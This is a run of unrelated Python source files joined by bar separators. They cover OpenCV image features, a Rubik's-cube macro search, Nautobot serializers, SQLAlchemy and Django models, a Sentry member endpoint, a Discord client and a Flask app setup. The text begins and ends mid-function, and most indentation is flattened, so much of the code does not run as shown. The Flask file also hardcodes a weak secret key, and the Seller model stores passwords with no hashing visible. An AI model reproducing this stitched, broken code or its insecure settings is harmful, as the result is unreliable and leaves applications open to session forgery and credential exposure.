criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 200, 0.1)
flags = cv2.KMEANS_RANDOM_CENTERS
_, labels, centroids = cv2.kmeans(pixels, n_colors, None, criteria, 10, flags)
palette = np.uint8(centroids)
quantized = palette[labels.flatten()]
quantized = quantized.reshape(img.shape)
    label_counts = np.bincount(labels.flatten())
    dominant_color = palette[np.argmax(label_counts)]
dominant_color = (dominant_color / 255).squeeze()
return {
"dominant_color_r": dominant_color[0],
"dominant_color_g": dominant_color[1],
"dominant_color_b": dominant_color[2],
}
def get_blurrness_score(img):
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
blurness_score = cv2.Laplacian(gray, cv2.CV_64F).var()
return {"blurness_score": blurness_score}
def get_shape(img):
return {"width": img.shape[0], "height": img.shape[1]}
def get_brightness_and_saturation_and_contrast(img):
def get_stats(img):
img = img.reshape(-1, 3)
return np.concatenate(
[img.mean(axis=0), img.std(axis=0), img.min(axis=0), img.max(axis=0)]
)
yuv = get_stats(cv2.cvtColor(img, cv2.COLOR_BGR2YUV))
hls = get_stats(cv2.cvtColor(img, cv2.COLOR_BGR2HLS))
result = {}
result.update({"yuv_stats_" + str(i): stats for i, stats in enumerate(yuv)})
result.update({"hls_stats_" + str(i): stats for i, stats in enumerate(hls)})
return result
def get_colorfullness(img):
    (B, G, R) = cv2.split(img.astype("float"))
rg = np.absolute(R - G)
yb = np.absolute(0.5 * (R + G) - B)
(rb_mean, rb_std) = (np.mean(rg), np.std(rg))
(yb_mean, yb_std) = (np.mean(yb), np.std(yb))
std_root = np.sqrt((rb_std ** 2) + (yb_std ** 2))
mean_root = np.sqrt((rb_mean ** 2) + (yb_mean ** 2))
colorfullness = std_root + (0.3 * mean_root)
return {"colorfullness": colorfullness}
def get_interest_points(img):
fast = cv2.FastFeatureDetector_create()
kp = fast.detect(img, None)
return {"interest_points": len(kp)}
def get_saliency_features(img):
saliency = Saliency(img).get_saliency_map()
binary_saliency = np.where(saliency > 3 * saliency.mean(), 1, 0).astype("uint8")
prop_background = 1 - binary_saliency.mean()
n_components, output, stats, centroids = cv2.connectedComponentsWithStats(
binary_saliency
)
sizes = stats[:, -1]
    bboxes = stats[:, :-1]  # per-component bounding boxes as [x, y, width, height]
    max_component_size = max(sizes) / img.shape[0] / img.shape[1]
    x, y, w, h = bboxes[np.argmax(sizes)]
    max_component_avg_saliency = saliency[y : y + h, x : x + w].mean()
    s = centroids / [img.shape[1], img.shape[0]]  # normalize (x, y) by (width, height)
dist = euclidean_distances(s)
mean_dist = dist[~np.eye(dist.shape[0], dtype=bool)].mean()
    max_component_centroid = s[np.argmax(sizes)]
    min_dist_from_third_points = min(
        np.linalg.norm(max_component_centroid - [1 / 3, 1 / 3]),
        np.linalg.norm(max_component_centroid - [1 / 3, 2 / 3]),
        np.linalg.norm(max_component_centroid - [2 / 3, 1 / 3]),
        np.linalg.norm(max_component_centroid - [2 / 3, 2 / 3]),
)
dist_from_center = np.linalg.norm(s - [0.5, 0.5], axis=1)
mean_dist_from_center = dist_from_center.mean()
sum_dist_from_center = dist_from_center.sum()
result = {
"prop_background": prop_background,
"n_components": n_components,
"max_component_size": max_component_size,
"max_component_avg_saliency": max_component_avg_saliency,
"mean_dist": mean_dist,
"min_dist_from_third_points": min_dist_from_third_points,
"mean_dist_from_center": mean_dist_from_center,
"sum_dist_from_center": sum_dist_from_center,
}
return result
def get_face_features(img, cascade_path):
cascade = cv2.CascadeClassifier(cascade_path)
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
facerect = cascade.detectMultiScale(
gray, scaleFactor=1.08, minNeighbors=1, minSize=(20, 20)
)
face_area = 0
face_area_prop = 0
if len(facerect) > 0:
for rect in facerect:
x, y, w, h = rect
face_area += w * h
face_area_prop = face_area / img.shape[0] / img.shape[1]
return {
"num_faces": len(facerect),
"face_area": face_area,
"face_area_prop": face_area_prop,
}
class ImageFeaturesTransformer(BaseFeatureTransformer):
def __init__(self, path_list, cascade_path=None, workers=1, name=""):
self.path_list = path_list
self.workers = workers
self.name = name
if cascade_path is None:
module_path = os.path.dirname(__file__)
cascade_path = os.path.join(
module_path, "external_data", "haarcascade_frontalface_alt2.xml"
)
self.functions = [
get_dullness,
get_average_pixel_width,
get_blurrness_score,
get_brightness_and_saturation_and_contrast,
get_colorfullness,
get_dominant_color,
get_interest_points,
get_saliency_features,
get_shape,
partial(get_face_features, cascade_path=cascade_path),
]
def _get_features(self, path):
img = cv2.imread(path)
result = {k: v for f in self.functions for k, v in f(img).items()}
return pd.Series(result)
def _transform(self, paths):
return pd.Series(paths).apply(self._get_features)
def _parallel_transform(self):
with multiprocessing.Pool(processes=self.workers) as p:
splits = np.array_split(self.path_list, self.workers)
features = p.map(self._transform, splits)
features = pd.concat(features).reset_index(drop=True)
features.columns = [self.name + c for c in features.columns]
return features
def transform(self, dataframe):
self.features = [self._parallel_transform()]
dataframe = pd.concat([dataframe] + self.features, axis=1)
return dataframe
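# Usage sketch (illustrative only): the transformer computes one row of image
# statistics per path and appends the columns to an existing dataframe. The
# file paths below are assumptions; face detection additionally relies on the
# bundled haarcascade file under external_data/.
#
# paths = ["images/0001.jpg", "images/0002.jpg"]
# df = pd.DataFrame({"image_path": paths})
# transformer = ImageFeaturesTransformer(path_list=paths, workers=2, name="img_")
# df = transformer.transform(df)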
|
import numpy as np
def macro_search(state, domain, bfs_tree, pattern_database, max_depth, color_neutral=True):
# returns result = (recolor index, actions, rule index, macro, triggering state, new_state)
# or result = False if there is no path to a macro or solved state
patterns = pattern_database.patterns
wildcards = pattern_database.wildcard
macros = pattern_database.macros
paths = bfs_tree.paths(up_to_depth=max_depth)
if color_neutral:
recolorings = domain.color_neutral_to(state)
else:
recolorings = state.reshape(1, domain.state_size())
for sym, recoloring in enumerate(recolorings):
descendents = bfs_tree.states_rooted_at(recoloring, up_to_depth=max_depth)
for k in range(len(paths)):
actions, descendent = paths[k], descendents[k]
# Empty macro if problem is solved in descendent state
if domain.is_solved_in(descendent):
return sym, actions, 0, (), domain.solved_state(), domain.solved_state()
# Non-empty macro if matched
matched = pattern_database.query(descendent)
if matched:
rule_index = pattern_database.result()
macro = macros[rule_index]
new_state = domain.execute(macro, descendent)
return (sym, actions, rule_index, macro, descendent, new_state)
# Failure if no path to macro found
return False
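# Usage sketch (illustrative only): unpacking a macro_search result. The
# domain, bfs_tree and pattern_database objects are assumed to be constructed
# as in the __main__ block at the bottom of this file.
#
# result = macro_search(state, domain, bfs_tree, pattern_database, max_depth=2)
# if result is not False:
#     sym, actions, rule_index, macro, triggerer, new_state = result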
# def macro_search(state, domain, bfs_tree, pattern_database, max_depth, color_neutral=True):
# # returns result = (actions, neutral index, rule index, macro, new_state)
# # or result = False if there is no path to a macro or solved state
# paths = bfs_tree.paths(up_to_depth=max_depth)
# descendents = bfs_tree.states_rooted_at(state, up_to_depth=max_depth)
# patterns = pattern_database.patterns
# wildcards = pattern_database.wildcard
# macros = pattern_database.macros
# for k in range(len(paths)):
# actions, descendent = paths[k], descendents[k]
# # Empty macro if problem is solved in descendent state
# if domain.is_solved_in(descendent): return actions, 0, 0, (), domain.solved_state()
# # Non-empty macro if state matches a database pattern
# if color_neutral:
# # recolorings = domain.color_neutral_to(descendent)
# # recolorings = recolorings[:, np.newaxis, :]
# # matches = ((recolorings == patterns) | wildcards).all(axis=2)
# # r, p = np.unravel_index(matches.argmax(), matches.shape)
# # if matches[r, p]:
# # recolored, macro = recolorings[r,0], macros[p]
# # return (actions, r, macro, domain.execute(macro, recolored))
# for r, recolored in enumerate(domain.color_neutral_to(descendent)):
# matched = pattern_database.query(recolored)
# if matched:
# rule_index = pattern_database.result()
# macro = macros[rule_index]
# new_state = domain.execute(macro, recolored)
# # print("assert, pattern, wildcard, trigger, recolored")
# # assert ((recolored == patterns[rule_index]) | wildcards[rule_index]).all()
# # print(patterns[rule_index])
# # print(wildcards[rule_index].astype(int))
# # print((patterns * (1-wildcards))[rule_index])
# # print(recolored)
# return (actions, r, rule_index, macro, new_state)
# # _, macro = pattern_database.result()
# # return (actions, r, macro, domain.execute(macro, recolored))
# else:
# matched = pattern_database.query(descendent)
# if matched:
# rule_index = pattern_database.result()
# macro = macros[rule_index]
# new_state = domain.execute(macro, descendent)
# return (actions, 0, rule_index, macro, new_state)
# # _, macro = pattern_database.result()
# # return (actions, 0, macro, domain.execute(macro, descendent))
# # Failure if no path to macro found
# return False
def run(state, domain, bfs_tree, pattern_database, max_depth, max_actions, color_neutral=True):
# returns solved, plan, rule_indices, triggerers
# solved: True if path to solved state was found, False otherwise
# plan: [...,(actions, sym index, macro),...] a sequence of macro_search results
# Form plan one macro at a time
plan = []
rules = []
triggerers = []
num_actions = 0
while True:
# Search for next macro
result = macro_search(state, domain, bfs_tree, pattern_database, max_depth, color_neutral)
# Return failure if none found
if result is False: return False, plan, rules, triggerers
# Execute search result
sym, actions, rule_index, macro, triggerer, state = result
plan.append((sym, actions, macro))
rules.append(rule_index)
triggerers.append(triggerer)
# Fail if max actions exceeded
num_actions += len(actions) + len(macro)
# num_actions += max(len(actions) + len(macro), 1) # make sure count always increases
if num_actions > max_actions: return False, plan, rules, triggerers
# Terminate once solved
if domain.is_solved_in(state): return True, plan, rules, triggerers
# def run(state, domain, bfs_tree, pattern_database, max_depth, max_actions, color_neutral=True):
# # returns solved, plan, rule_indices, interstates
# # solved: True if path to solved state was found, False otherwise
# # plan: [...,(actions, sym index, macro),...] a sequence of macro_search results
# # Form plan one macro at a time
# plan = []
# rules = []
# states = []
# num_actions = 0
# while True:
# # Search for next macro
# result = macro_search(state, domain, bfs_tree, pattern_database, max_depth, color_neutral)
# # Return failure if none found
# if result is False: return False, plan, rules, states
# # Execute search result
# actions, sym, rule_index, macro, new_state = result
# plan.append((actions, sym, macro))
# rules.append(rule_index)
# states.append(new_state)
# state = new_state
# # Fail if max actions exceeded
# num_actions += len(actions) + len(macro)
# # num_actions += max(len(actions) + len(macro), 1) # make sure count always increases
# if num_actions > max_actions: return False, plan, rules, states
# # Terminate once solved
# if domain.is_solved_in(state): return True, plan, rules, states
if __name__ == "__main__":
import numpy as np
# #### test macro_search
# max_depth = 2
# from cube import CubeDomain
# domain = CubeDomain(3)
# from tree import SearchTree
# bfs_tree = SearchTree(domain, max_depth)
# from pattern_database import PatternDatabase
# # patterns = domain.solved_state().reshape(1,-1)
# # macros = [((0,1,0),)]
# patterns = domain.perform((0,1,1), domain.solved_state()).reshape(1,-1)
# wildcards = np.zeros(patterns.shape, dtype=bool)
# macros = [((0,1,3),)]
# pattern_database = PatternDatabase(patterns, wildcards, macros, domain)
# state = domain.solved_state()
# actions = ((0,1,1),)
# state = domain.execute(domain.reverse(macros[0]), state)
# new_state = domain.color_neutral_to(state)[2,:]
# invsym = (domain.color_neutral_to(new_state) == state).all(axis=1).argmax()
# state = domain.execute(domain.reverse(actions), new_state)
# result = macro_search(state, domain, bfs_tree, pattern_database, max_depth)
# print(result)
# assert result
# path, s, macro, new_state = result
# print(path)
# assert path == actions
# print(s, invsym)
# assert s == invsym
# print(macro)
# assert macro == macros[0]
# print(new_state)
# assert (new_state == domain.solved_state()).all()
#### test run
max_depth = 2
from cube import CubeDomain
domain = CubeDomain(3)
from tree import SearchTree
bfs_tree = SearchTree(domain, max_depth)
import numpy as np
from pattern_database import PatternDatabase
state = domain.solved_state()
patterns = np.stack((
domain.execute([(0,1,1),(1,1,1)], state),
domain.execute([(0,1,1),(1,1,1),(2,1,1),(1,1,1),(0,1,1)], state),
))
wildcard = np.zeros(patterns.shape, dtype=bool)
macros = (
((1,1,3),(0,1,3)),
((0,1,3),(1,1,3),(2,1,3)),
)
pattern_database = PatternDatabase(patterns, wildcard, macros, domain)
matched = pattern_database.query(patterns[1])
assert matched
rule_index = pattern_database.result()
macro = pattern_database.macros[rule_index]
assert macro == macros[1]
matched = pattern_database.query(domain.solved_state())
assert not matched
actions = ((1,1,1),)
sym = 4
state = domain.execute(domain.reverse(actions), patterns[1])
state = domain.color_neutral_to(state)[sym]
# invsym = (domain.color_neutral_to(state) == patterns[1]).all(axis=1).argmax()
invsym = domain.inverse_symmetry_of(sym)
solved, plan, rules, triggerers = run(state, domain, bfs_tree, pattern_database, max_depth=1, max_actions=20)
assert solved
s, path, macro = plan[0]
assert path == actions
assert s == invsym
assert macro == macros[1]
assert rules[0] == 1
assert domain.is_solved_in(domain.execute(macros[rules[-1]], triggerers[-1]))
import matplotlib.pyplot as pt
def draw(st, title, i):
ax = pt.subplot(4, 6, i)
domain.render(st, ax, 0, 0)
ax.axis("equal")
ax.axis('off')
ax.set_title(title)
i = 1
draw(state, "initial", i)
i += 1
for (sym, actions, macro) in plan:
print(sym)
print(actions)
print(macro)
state = domain.color_neutral_to(state)[sym]
draw(state, str(sym), i)
i += 1
for action in actions:
state = domain.perform(action, state)
draw(state, str(action), i)
i += 1
# state = domain.color_neutral_to(state)[sym]
# draw(state, str(sym), i)
# i += 1
for action in macro:
state = domain.perform(action, state)
draw(state, str(action), i)
i += 1
pt.show()
|
from django.contrib.contenttypes.models import ContentType
from rest_framework import serializers
from nautobot.core.api import ChoiceField, ContentTypeField, WritableNestedSerializer
from nautobot.extras import choices, models
from nautobot.users.api.nested_serializers import NestedUserSerializer
__all__ = [
"NestedConfigContextSerializer",
"NestedConfigContextSchemaSerializer",
"NestedCustomFieldSerializer",
"NestedCustomLinkSerializer",
"NestedExportTemplateSerializer",
"NestedGitRepositorySerializer",
"NestedGraphQLQuerySerializer",
"NestedImageAttachmentSerializer",
"NestedJobResultSerializer",
"NestedRelationshipSerializer",
"NestedRelationshipAssociationSerializer",
"NestedScheduledJobSerializer",
"NestedSecretSerializer",
"NestedSecretsGroupSerializer",
"NestedStatusSerializer",
"NestedTagSerializer",
"NestedWebhookSerializer",
]
class NestedConfigContextSerializer(WritableNestedSerializer):
url = serializers.HyperlinkedIdentityField(view_name="extras-api:configcontext-detail")
class Meta:
model = models.ConfigContext
fields = ["id", "url", "name"]
class NestedConfigContextSchemaSerializer(WritableNestedSerializer):
url = serializers.HyperlinkedIdentityField(view_name="extras-api:configcontextschema-detail")
class Meta:
model = models.ConfigContextSchema
fields = ["id", "url", "name", "slug"]
class NestedCustomFieldSerializer(WritableNestedSerializer):
url = serializers.HyperlinkedIdentityField(view_name="extras-api:customfield-detail")
class Meta:
model = models.CustomField
fields = ["id", "url", "name"]
class NestedCustomLinkSerializer(WritableNestedSerializer):
url = serializers.HyperlinkedIdentityField(view_name="extras-api:customlink-detail")
content_type = ContentTypeField(
queryset=ContentType.objects.all(),
)
class Meta:
model = models.CustomLink
fields = ["content_type", "id", "name", "url"]
class NestedExportTemplateSerializer(WritableNestedSerializer):
url = serializers.HyperlinkedIdentityField(view_name="extras-api:exporttemplate-detail")
class Meta:
model = models.ExportTemplate
fields = ["id", "url", "name"]
class NestedGitRepositorySerializer(WritableNestedSerializer):
url = serializers.HyperlinkedIdentityField(view_name="extras-api:gitrepository-detail")
class Meta:
model = models.GitRepository
fields = ["id", "url", "name"]
class NestedGraphQLQuerySerializer(WritableNestedSerializer):
url = serializers.HyperlinkedIdentityField(view_name="extras-api:graphqlquery-detail")
class Meta:
model = models.GraphQLQuery
fields = ["id", "url", "name"]
class NestedImageAttachmentSerializer(WritableNestedSerializer):
url = serializers.HyperlinkedIdentityField(view_name="extras-api:imageattachment-detail")
class Meta:
model = models.ImageAttachment
fields = ["id", "url", "name", "image"]
class NestedJobLogEntrySerializer(serializers.ModelSerializer):
url = serializers.HyperlinkedIdentityField(view_name="extras-api:joblogentry-detail")
class Meta:
model = models.JobLogEntry
fields = [
"id",
"url",
"absolute_url",
"created",
"grouping",
"log_level",
"log_object",
"message",
]
class NestedJobResultSerializer(serializers.ModelSerializer):
url = serializers.HyperlinkedIdentityField(view_name="extras-api:jobresult-detail")
status = ChoiceField(choices=choices.JobResultStatusChoices)
user = NestedUserSerializer(read_only=True)
class Meta:
model = models.JobResult
fields = ["id", "url", "name", "created", "completed", "user", "status"]
class NestedRelationshipSerializer(WritableNestedSerializer):
url = serializers.HyperlinkedIdentityField(view_name="extras-api:relationship-detail")
class Meta:
model = models.Relationship
fields = ["id", "url", "name", "slug"]
class NestedRelationshipAssociationSerializer(WritableNestedSerializer):
url = serializers.HyperlinkedIdentityField(view_name="extras-api:relationshipassociation-detail")
class Meta:
model = models.RelationshipAssociation
fields = ["id", "url", "relationship", "source_id", "destination_id"]
class NestedScheduledJobSerializer(serializers.ModelSerializer):
name = serializers.CharField(max_length=255, required=False)
start_time = serializers.DateTimeField(format=None, required=False)
class Meta:
model = models.ScheduledJob
fields = ["name", "start_time", "interval"]
def validate(self, data):
data = super().validate(data)
if data["interval"] != choices.JobExecutionType.TYPE_IMMEDIATELY:
if "name" not in data:
raise serializers.ValidationError({"name": "Please provide a name for the job schedule."})
if "start_time" not in data or data["start_time"] < models.ScheduledJob.earliest_possible_time():
raise serializers.ValidationError(
{
"start_time": "Please enter a valid date and time greater than or equal to the current date and time."
}
)
return data
class NestedSecretSerializer(WritableNestedSerializer):
url = serializers.HyperlinkedIdentityField(view_name="extras-api:secret-detail")
class Meta:
model = models.Secret
fields = ["id", "url", "name", "slug"]
class NestedSecretsGroupSerializer(WritableNestedSerializer):
url = serializers.HyperlinkedIdentityField(view_name="extras-api:secretsgroup-detail")
class Meta:
model = models.SecretsGroup
fields = ["id", "url", "name", "slug"]
class NestedSecretsGroupAssociationSerializer(WritableNestedSerializer):
url = serializers.HyperlinkedIdentityField(view_name="extras-api:secretsgroupassociation-detail")
secret = NestedSecretSerializer()
class Meta:
model = models.SecretsGroupAssociation
fields = ["id", "url", "access_type", "secret_type", "secret"]
class NestedStatusSerializer(WritableNestedSerializer):
url = serializers.HyperlinkedIdentityField(view_name="extras-api:status-detail")
class Meta:
model = models.Status
fields = ["id", "url", "name", "slug"]
class NestedTagSerializer(WritableNestedSerializer):
url = serializers.HyperlinkedIdentityField(view_name="extras-api:tag-detail")
class Meta:
model = models.Tag
fields = ["id", "url", "name", "slug", "color"]
class NestedWebhookSerializer(WritableNestedSerializer):
url = serializers.HyperlinkedIdentityField(view_name="extras-api:webhook-detail")
class Meta:
model = models.Webhook
fields = ["id", "url", "name"]
|
import uuid
from app.db.database import Base
from pydantic import EmailStr, HttpUrl
from sqlalchemy import Boolean, Column, DateTime, String, func
from sqlalchemy.dialects.postgresql import UUID
from sqlalchemy.orm import relationship
class Seller(Base): # type: ignore
__tablename__ = "seller"
id = Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
email = Column(String, unique=True)
name = Column(String)
password = Column(String)
image_url = Column(String)
items = relationship("Item", back_populates="seller", lazy="joined")
is_active = Column(Boolean, default=True)
created_at = Column(
"created_at", DateTime, default=func.now(), nullable=False
)
updated_at = Column(
"updated_at",
DateTime,
default=func.now(),
onupdate=func.now(),
nullable=False,
)
def __init__(
self,
name: str,
email: EmailStr,
password: str,
image_url: HttpUrl,
):
self.name = name
self.email = email
self.password = password
self.image_url = image_url
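# Usage sketch (illustrative only): creating and persisting a Seller. The
# `session` object is assumed to come from the application's SQLAlchemy
# session factory; the password would normally be hashed before storage.
#
# seller = Seller(
#     name="Alice",
#     email="alice@example.com",
#     password="<hashed password>",
#     image_url="https://example.com/alice.png",
# )
# session.add(seller)
# session.commit()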
|
from __future__ import absolute_import
from django.db import transaction
from django.db.models import Q
from rest_framework import serializers
from rest_framework.response import Response
from sentry import roles
from sentry.api.bases.organization import (
OrganizationEndpoint, OrganizationPermission
)
from sentry.api.exceptions import ResourceDoesNotExist
from sentry.models import (
AuditLogEntryEvent, AuthIdentity, AuthProvider, OrganizationMember
)
ERR_NO_AUTH = 'You cannot remove this member with an unauthenticated API request.'
ERR_INSUFFICIENT_ROLE = 'You cannot remove a member who has more access than you.'
ERR_INSUFFICIENT_SCOPE = 'You are missing the member:delete scope.'
ERR_ONLY_OWNER = 'You cannot remove the only remaining owner of the organization.'
ERR_UNINVITABLE = 'You cannot send an invitation to a user who is already a full member.'
class OrganizationMemberSerializer(serializers.Serializer):
reinvite = serializers.BooleanField()
class RelaxedMemberPermission(OrganizationPermission):
scope_map = {
'GET': ['member:read', 'member:write', 'member:delete'],
'POST': ['member:write', 'member:delete'],
'PUT': ['member:write', 'member:delete'],
# DELETE checks for role comparison as you can either remove a member
# with a lower access role, or yourself, without having the req. scope
'DELETE': ['member:read', 'member:write', 'member:delete'],
}
class OrganizationMemberDetailsEndpoint(OrganizationEndpoint):
permission_classes = [RelaxedMemberPermission]
def _get_member(self, request, organization, member_id):
if member_id == 'me':
queryset = OrganizationMember.objects.filter(
organization=organization,
user__id=request.user.id,
user__is_active=True,
)
else:
queryset = OrganizationMember.objects.filter(
Q(user__is_active=True) | Q(user__isnull=True),
organization=organization,
id=member_id,
)
return queryset.select_related('user').get()
def _is_only_owner(self, member):
if member.role != roles.get_top_dog().id:
return False
queryset = OrganizationMember.objects.filter(
organization=member.organization_id,
role=roles.get_top_dog().id,
user__isnull=False,
user__is_active=True,
).exclude(id=member.id)
if queryset.exists():
return False
return True
def put(self, request, organization, member_id):
try:
om = self._get_member(request, organization, member_id)
except OrganizationMember.DoesNotExist:
raise ResourceDoesNotExist
serializer = OrganizationMemberSerializer(data=request.DATA, partial=True)
if not serializer.is_valid():
return Response(status=400)
has_sso = AuthProvider.objects.filter(
organization=organization,
).exists()
result = serializer.object
# XXX(dcramer): if/when this expands beyond reinvite we need to check
# access level
if result.get('reinvite'):
if om.is_pending:
om.send_invite_email()
elif has_sso and not getattr(om.flags, 'sso:linked'):
om.send_sso_link_email()
else:
# TODO(dcramer): proper error message
return Response({'detail': ERR_UNINVITABLE}, status=400)
return Response(status=204)
def delete(self, request, organization, member_id):
try:
om = self._get_member(request, organization, member_id)
except OrganizationMember.DoesNotExist:
raise ResourceDoesNotExist
if request.user.is_authenticated() and not request.is_superuser():
try:
acting_member = OrganizationMember.objects.get(
organization=organization,
user=request.user,
)
except OrganizationMember.DoesNotExist:
return Response({'detail': ERR_INSUFFICIENT_ROLE}, status=400)
else:
if acting_member != om:
if not request.access.has_scope('member:delete'):
return Response({'detail': ERR_INSUFFICIENT_SCOPE}, status=400)
elif not roles.can_manage(acting_member.role, om.role):
return Response({'detail': ERR_INSUFFICIENT_ROLE}, status=400)
# TODO(dcramer): do we even need this check?
elif not request.access.has_scope('member:delete'):
return Response({'detail': ERR_INSUFFICIENT_SCOPE}, status=400)
if self._is_only_owner(om):
return Response({'detail': ERR_ONLY_OWNER}, status=403)
audit_data = om.get_audit_log_data()
with transaction.atomic():
AuthIdentity.objects.filter(
user=om.user,
auth_provider__organization=organization,
).delete()
om.delete()
self.create_audit_entry(
request=request,
organization=organization,
target_object=om.id,
target_user=om.user,
event=AuditLogEntryEvent.MEMBER_REMOVE,
data=audit_data,
)
return Response(status=204)
|
import logging
from django.db import models
from jsonfield import JSONField
from ...bases.metadata.models import BaseListingItemRelation
logger = logging.getLogger(__name__)
class EmbeddedInfo(models.Model):
path = models.CharField(max_length=500)
query_key = models.CharField(max_length=50)
index = models.IntegerField(null=True)
title = models.CharField(max_length=300, null=True)
cover = models.URLField(null=True, max_length=1000)
year = models.IntegerField(null=True)
plot = models.TextField(null=True)
duration = models.IntegerField(null=True)
rating = models.DecimalField(null=True, decimal_places=2, max_digits=3)
    genres = JSONField(default=list)
primary_language = models.CharField(max_length=50, null=True)
file_source = models.CharField(null=True, max_length=100)
group = models.CharField(max_length=300, null=True)
mediainfo_resolution = models.CharField(null=True, max_length=100)
mediainfo_codec = models.CharField(null=True, max_length=100)
mediainfo_container = models.CharField(null=True, max_length=100)
mediainfo_source = models.CharField(null=True, max_length=100)
mediainfo_scene = models.BooleanField(default=False)
mediainfo_dual_audio = models.BooleanField(default=False)
mediainfo_audio = models.CharField(null=True, max_length=100)
mediainfo_best = models.BooleanField(
default=False
) # probably the best choice if you have to choose
bittorrent_seeders = models.IntegerField(null=True)
bittorrent_leechers = models.IntegerField(null=True)
bittorrent_snatched = models.IntegerField(null=True)
episodeinfo_episode_type = models.CharField(max_length=200, blank=True, null=True)
episodeinfo_season = models.IntegerField(blank=True, null=True)
episodeinfo_episode = models.IntegerField(blank=True, null=True)
episodeinfo_year = models.IntegerField(blank=True, null=True)
episodeinfo_month = models.IntegerField(blank=True, null=True)
episodeinfo_day = models.IntegerField(blank=True, null=True)
episodeinfo_sub_title = models.CharField(max_length=150, blank=True, null=True)
datetime = models.DateTimeField(auto_now=True)
class Meta:
unique_together = (("query_key", "path"),)
@property
def metadata_name(self):
return "embedded"
@property
def identifier(self):
return self.pk
def set_available(self):
if self.file_source == "bittorrent":
self.bittorrent_available = True
self.save()
class ListingItemRelation(BaseListingItemRelation):
metadata = models.ForeignKey(EmbeddedInfo, on_delete=models.CASCADE)
|
"""
Created by Epic at 9/1/20
"""
from asyncio import Event, get_event_loop, Lock
from logging import getLogger
from .exceptions import Unauthorized, ConnectionsExceeded, InvalidToken
from .http import HttpClient, Route
from .dispatcher import OpcodeDispatcher, EventDispatcher
from .gateway import DefaultGatewayHandler
from .shard import DefaultShard
__all__ = ("Client",)
class Client:
def __init__(self, intents, token=None, *, shard_count=None, shard_ids=None):
"""
The client to interact with the discord API
:param intents: the intents to use
:param token: the discord bot token to use
:param shard_count: how many shards to use
:param shard_ids: A list of shard ids to spawn. Shard_count must be set for this to work
"""
# Configurable stuff
self.intents = int(intents)
self.token = token
self.shard_count = shard_count
self.shard_ids = shard_ids
        # Internals used by the lib; these usually don't need to be changed, but can be if you want to.
self.shards = []
self.loop = get_event_loop()
self.logger = getLogger("speedcord")
self.http = None
self.opcode_dispatcher = OpcodeDispatcher(self.loop)
self.event_dispatcher = EventDispatcher(self.loop)
self.gateway_handler = DefaultGatewayHandler(self)
self.connected = Event()
self.exit_event = Event(loop=self.loop)
self.remaining_connections = None
self.connection_lock = Lock(loop=self.loop)
# Default event handlers
self.opcode_dispatcher.register(0, self.handle_dispatch)
# Check types
if shard_count is None and shard_ids is not None:
raise TypeError("You have to set shard_count if you use shard_ids")
def run(self):
"""
Starts the client
"""
try:
self.loop.run_until_complete(self.start())
except KeyboardInterrupt:
self.loop.run_until_complete(self.close())
async def get_gateway(self):
"""
Get details about the gateway
:return: wss url to connect to
:return: how many shards to use
        :return: how many gateway connections are left
:return: how many ms until the gateway connection limit resets
"""
route = Route("GET", "/gateway/bot")
try:
r = await self.http.request(route)
except Unauthorized:
await self.close()
raise
data = await r.json()
shards = data["shards"]
remaining_connections = data["session_start_limit"]["remaining"]
connections_reset_after = data["session_start_limit"]["reset_after"]
gateway_url = data["url"]
if remaining_connections == 0:
raise ConnectionsExceeded
self.remaining_connections = remaining_connections
self.logger.debug(f"{remaining_connections} gateway connections left!")
return gateway_url, shards, remaining_connections, connections_reset_after
async def connect(self):
"""
Connects to discord and spawns shards. Start has to be called first!
"""
if self.token is None:
raise InvalidToken
try:
gateway_url, shard_count, _, connections_reset_after = await self.get_gateway()
except Unauthorized:
self.exit_event.clear()
raise InvalidToken
if self.shard_count is None or self.shard_count < shard_count:
self.shard_count = shard_count
shard_ids = self.shard_ids or range(self.shard_count)
for shard_id in shard_ids:
self.logger.debug(f"Launching shard {shard_id}")
shard = DefaultShard(shard_id, self, loop=self.loop)
self.loop.create_task(shard.connect(gateway_url))
self.shards.append(shard)
self.connected.set()
self.logger.info("All shards connected!")
async def start(self):
"""
Sets up the http client and connects to discord and spawns shards.
"""
if self.token is None:
raise InvalidToken
self.http = HttpClient(self.token, loop=self.loop)
await self.connect()
await self.exit_event.wait()
await self.close()
async def close(self):
"""
Closes the http client and disconnects all shards
"""
self.connected.clear()
self.exit_event.set()
await self.http.close()
for shard in self.shards:
await shard.close()
def listen(self, event):
"""
        Listen to an event or an opcode.
        :param event: an opcode or event name to listen to
"""
def get_func(func):
if isinstance(event, int):
self.opcode_dispatcher.register(event, func)
elif isinstance(event, str):
self.event_dispatcher.register(event, func)
else:
raise TypeError("Invalid event type!")
return get_func
# Handle events
async def handle_dispatch(self, data, shard):
"""
        Dispatches an event to the event handler.
        :param data: the data to dispatch
        :param shard: the shard the event was received on
"""
self.event_dispatcher.dispatch(data["t"], data["d"], shard)
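# Usage sketch (illustrative only): a minimal bot built on this client. The
# intents value and token are placeholders, and the (data, shard) handler
# signature mirrors how handle_dispatch forwards gateway events.
#
# client = Client(intents=512, token="YOUR_BOT_TOKEN")
#
# @client.listen("MESSAGE_CREATE")
# async def on_message(data, shard):
#     print(data["content"])
#
# client.run()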
|
import os
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_migrate import Migrate
from flask_login import LoginManager
from flask_uploads import UploadSet, configure_uploads
from flask_uploads.extensions import DOCUMENTS, IMAGES
files = UploadSet('files', IMAGES + DOCUMENTS)
db = SQLAlchemy()
DB_NAME = 'welearn.db'
def create_app():
app = Flask(__name__)
app.config['SECRET_KEY'] = 'welearn welearn welearn'
#Upload folder config
app.config['UPLOADED_FILES_DEST'] = os.path.realpath('.') + '/uploads'
app.config['UPLOADED_FILES_ALLOW'] = ["JPEG", "JPG", "PNG", "PDF"]
app.config['MAX_CONTENT_LENGTH'] = 10 * 1000 * 1000 #Max file size 10MB
configure_uploads(app, files)
#Database config
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config['SQLALCHEMY_DATABASE_URI'] = f'sqlite:///{DB_NAME}'
db.init_app(app)
migrate = Migrate(app, db)
#Import models
from myapp.models import User, Role, News, Subject, Module
#Import blueprint
from myapp.auth import auth
app.register_blueprint(auth, url_prefix='/')
from myapp.admin import admin
app.register_blueprint(admin, url_prefix='/admin')
from myapp.teacher import teacher
app.register_blueprint(teacher, url_prefix='/teacher')
from myapp.student import student
